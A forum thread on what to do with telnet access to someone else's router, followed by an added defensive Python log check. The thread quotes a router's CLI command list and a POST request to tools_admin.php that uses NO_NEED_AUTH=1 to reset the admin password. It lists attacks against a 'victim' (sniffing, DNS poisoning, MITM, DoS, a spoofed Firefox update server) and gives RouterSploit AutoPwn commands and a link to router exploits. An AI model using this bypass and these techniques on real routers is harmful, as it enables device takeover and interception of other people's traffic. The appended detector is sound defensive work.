- what to do with access to remote router?
- So let's assume there is access to a remote router and that it is possible to telnet into it. The list of supported commands is:
- list of supported commands :
- ? | exit | help
- exec < iwconfig | iwpriv | iwgetid | iwspy | iwlist | iptables | ifconfig >
- exec < route | netstat | arp | nslookup | vconfig | switch | ping >
- exec < hostname | ps | killall | kill | top | free | reboot | lsmod >
- exec < insmod | rmmod | cat | ls | head | tail | umount | mount | mkdir >
- exec < rm | proc >
- flash < default >
- all <sample>
- get <mib_name>
- set <mib_name>[ <value>]
- lan < status >
- addr <ip-address> | ?
- dhcp < ? | status | on | off >
- client [start_ip <end_ip>]
- slease < ? | status | clearall >
- add <mac_addr> <ip_addr>
- del [id]
- iptv < ? | status | disable >
- direct < 1 | 2 | 3 | 4 | 3+4 >
- vlan < 1 | 2 | 3 | 4 | 3+4 >
- voip < ? | status | disable | enable >
- route < ? | status >
- add <dest_addr|default> <gateway> [<metric>]
- del <host addr|default>
- nat < ? | status | clearall >
- add <ip addr> <server> [bcast] [protocol <from port [to port] [d...
- del <id>
- sys < atsh | status | reload | delayed | commit | reboot | log | diag >
- sys < ports >
- mode < ? | status | gateway | wisp | ap >
- update <0:disabled|1:enabled>
- apply [bridge|wan]
- manage
- access
- web <?|0:disabled|1:enabled> [port]
- icmp <?|0:disabled|1:enabled>
- telnet <?|0:disabled|1:enabled> [port]
- ping <domain_name|ip-address>
- nslookup <domain_name>
- password <password>
- service
- webface < status | start | stop >
- wan < status | none >
- link < ? | status >
- clone < ? | status | default | <mac-addr> | <ip-addr> >
- dns < ? | status | auto >
- manual [server-1 [server-2 [server-3]]]
- static <?|[ip_addr <netmask> <gateway>]>
- dhcp < ? | status | on | release | renew >
- 802.1x < ? | status | disable >
- md5 <user name> <password>
- chap <user name> <password>
- mschap <user name> <password>
- mschap2 <user name> <password>
- peap-mschap2 <user name> <password>
- upnp < ? | status | enable | disable >
- sroute < ? | status | enable | disable | clearall >
- add <ip-address> <subnet mask> <gateway>
- del <id>
- ppp < none | connect | disconnect | start | stop >
- pppoe <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
- pptp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
- l2tp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
- reinit < ? | status | enable | disable >
- wlan < status | ssid | rate | channel | clients | survey >
- enable < ? | status | on | off >
- band < ? | b | g | bg | n | gn | bgn >
- auth < none >
- open < wep64 | wep128 >
- shared < wep64 | wep128 >
- wpapsk < tkip | aes | tkipaes >
- wpa2psk < tkip | aes | tkipaes >
- wpapskwpa2psk < tkip | aes | tkipaes >
- What can be done remotely with such commands? Is it possible to sniff traffic or to use the router as a VPN? What would you do? Thanks
- Next we're gonna post an HTTP request
- Quote:
- POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
- Host: 192.168.1.2
- Keep-Alive: 115
- Content-Type: application/x-www-form-urlencoded
- Content-length: 0
- ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&
- admin_name=admin&admin_password1=uhOHahEh
- so you are resetting the admin pass with that
- to enable or to know the telnet logins
- so "what after telnet" is your question
- so it's simple
- #Sniffing
- #Dns Poisoning
- #Network flooding
- #Hack Network cameras
- #Hack DMV server
- #Network DOS
- #Corrupting the IP Routing table
- #Conducting a MITM attack
- #Write Arp-trigger scripts which execute some functions into network if one system calls a particular function
- #Making a Fake Update server to Fool devices
- (example: if you know your victim's PC has Firefox)
- at start-up, every time, Firefox will check http://www.mozilla.org/en-US/plugincheck/
- for any updates; you just spoof a *.update.* (a wildcard update; we are putting the wildcard at the front and the end to ensure it will be matched whatever plugins the system has). As you have telnet access to the router you can do anything with the network.
- Another best thing is:
- after telnet you can browse system files by just running pwd and ls -a
- $ cd /var
- but not beyond the var directory
- and you can do lots more, but not serious damage.
- if you want further access you can exploit it by the steps below
- <3 The Metasploit version for routers is RouterSploit
- Just get into Network
- RouterSploit > use /payload/AutoPwn
- RouterSploit(AutoPwn) > setg LHOST 192.168.1.1
- RouterSploit (AutoPwn)> run
- there are even lots of reverse shell exploits
- So it fucks your router with all the available exploits on the rtrpwn server
- if you want to exploit using the scripts directly or manually
- you can download exploits for router from here
- http://www.routerpwn.com/
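As an added example (not part of this thread, not the router vendor's code), a defender-side check for the request quoted above: the POST to tools_admin.php changes the admin password in the same request that carries NO_NEED_AUTH=1 and a bundled LOGIN action with throwaway credentials, which is the shape worth alerting on in web-server or proxy logs. The Python below scans constructed log lines for exactly that pattern; the log line layout (client IP, method, path, URL-encoded body) is an assumption made for the example and not a real router log format.

```python
from urllib.parse import parse_qs

# Constructed log lines for the example: "<client ip> <method> <path> <urlencoded body or ->".
# The first line mirrors the POST quoted in the thread; the others are benign traffic.
SAMPLE_LOG = """\
192.168.1.2 POST /tools_admin.php ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
192.168.1.50 GET /index.php -
192.168.1.7 POST /tools_admin.php admin_name=admin&admin_password1=newpass&session=abc123
192.168.1.9 POST /tools_admin.php ACTION_POST=LOGIN&LOGIN_USER=admin&LOGIN_PASSWD=secret
"""


def parse_line(line):
    """Split one log line into its fields and decode the form body (if any)."""
    ip, method, path, body = line.split(" ", 3)
    params = parse_qs(body, keep_blank_values=True) if body != "-" else {}
    return {"ip": ip, "method": method, "path": path, "params": params}


def is_unauthenticated_password_reset(entry):
    """True when a POST to tools_admin.php sets a new admin password in the same
    request that claims NO_NEED_AUTH=1 or bundles a LOGIN action, i.e. the shape
    of the request quoted in the thread. A password change from an existing
    session, or a plain login, is not flagged."""
    if entry["method"] != "POST" or not entry["path"].endswith("/tools_admin.php"):
        return False
    p = entry["params"]
    changes_password = "admin_password1" in p
    bypass_flag = p.get("NO_NEED_AUTH", [""])[0] == "1"
    piggybacked_login = p.get("ACTION_POST", [""])[0] == "LOGIN"
    return changes_password and (bypass_flag or piggybacked_login)


def find_suspicious(log_text):
    """Return (client ip, path) for every log line matching the pattern."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if is_unauthenticated_password_reset(entry):
            hits.append((entry["ip"], entry["path"]))
    return hits


if __name__ == "__main__":
    for ip, path in find_suspicious(SAMPLE_LOG):
        print(f"admin password change without prior authentication from {ip} to {path}")
```

The check only looks at the body fields that appear in the quoted request, so it will not fire on a routine password change made by an authenticated session. The more durable fix is not to expose the management interface at all: the CLI help quoted in the question lists, under `manage` / `access`, a `web <0:disabled|1:enabled> [port]` and a `telnet <0:disabled|1:enabled> [port]` setting, which is where remote web and telnet management gets switched off on that device.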